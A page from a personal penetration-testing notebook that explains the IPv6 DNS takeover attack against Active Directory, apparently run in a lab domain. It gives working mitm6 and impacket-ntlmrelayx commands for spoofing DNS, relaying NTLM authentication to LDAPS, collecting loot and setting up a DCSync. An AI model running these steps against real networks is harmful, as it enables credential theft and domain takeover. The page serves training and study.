Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
    • Mimikatz
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AS-REP roasting
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Kerberosting
        • Kerberos "Double Hop" Problem
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
      • Token Impersonation
      • LNK File Attacks
      • Miscellaneous Misconfigurations
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Post Owning Domain
      • Attacking Active Directory & NTDS.dit 1
      • Golden Ticket Attacks
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • Steps (run for small sprints (5-10 mins only/ otherwise you can get outages)
  • 1. ntlmrelayx
  • 2. mitm6
  • 3. Force event (restart)
  • DC sync attack
  1. Active Directory
  2. IPv6 Attacks

IPV6 DNS takeover

PreviousIPv6 AttacksNextWPAD

Last updated 1 month ago

This attack takes advantage of machines utilizing IPv4 while still having IPv6 active in their network adapter properties. When a machine is configured in this way, one question comes to mind. Who is the DNS for IPv6? Most of the time, nobody.

With this misconfiguration, an attacker can listen for any incoming IPv6 traffic, declaring themselves as the DNS for IPv6. Through this process, an attacker can gain authentication to the Domain Controller with LDAP (Lightweight Directory Access Protocol) or SMB (Server Message Block).

After an event occurs on the target network, normally a machine rebooting or starting-up for the day, it goes to the attacker. The attacker can now use said event to authenticate to the Domain Controller. This can all be done on a non-administrative user account.

The attacker can then wait for credentials to be used on the target network, being provided said credentials by leveraging NTLM (Windows New Technology Lan Manager).

The attacker can now LDAP relay the user credentials to the Domain Controller and login if the relayed credentials are that of a domain administrator. This now allows the attacker to create an account on the Domain Controller.

Steps (run for small sprints (5-10 mins only/ otherwise you can get outages)

  1. Run ntlmrelayx

  2. Run mitm6

  3. On any even, we get an event (restart/login) which will be relayed

  4. If an administrator logs in, it tries to create a new user account, which we can use to perform DC sync attack.

1. ntlmrelayx

impacket-ntlmrelayx -6 -t ldaps://192.168.138.136 -wh fakewpad.marvel.local -l lootme
Flag / Parameter
Meaning

impacket-ntlmrelayx

The Impacket tool used to relay NTLM authentication.

-6

Enables IPv6 support. This is crucial for IPv6 DNS takeover attacks.

-t ldaps://192.168.138.136

Target for the relay — in this case, a LDAPS (LDAP over SSL) server at the given IP.

-wh fakewpad.marvel.local

WPAD (Web Proxy Auto-Discovery Protocol) hostname to inject into the victim’s system or used for poisoning (fake proxy server).

-l lootm

Directory where loot (dumped hashes, credentials, etc.) will be saved.

🧠 What This Setup Is Doing:

  • Listens for NTLM authentication over IPv6.

  • Relays the authentication to the LDAPS server at 192.168.138.136.

  • Uses fake WPAD (fakewpad.marvel.local) to trick clients into sending NTLM auth.

  • Stores captured credentials or data in the lootm directory.

This is part of a WPAD + NTLM relay over IPv6 attack, commonly used in enterprise environments with misconfigured DNS or IPv6-enabled clients.

2. mitm6

Installation

sudo apt install mitm6

Launch mitm6

sudo mitm6 -d marvel.local

3. Force event (restart)

Like restart or login .and we will get a success message.

and we will have information regarding computers, groups, users etc. It has enumerated everything

DC sync attack

If an admin logs in some computer, it auto adds a user that can be used to perform DC sync attack. The newly added user will have enterprise admin access. (not working for me)

IPv6 DNS Takeover with MitM6: Strategies for Network Security
IPv6 DNS TakeoverRedfox Security
Logo
Logo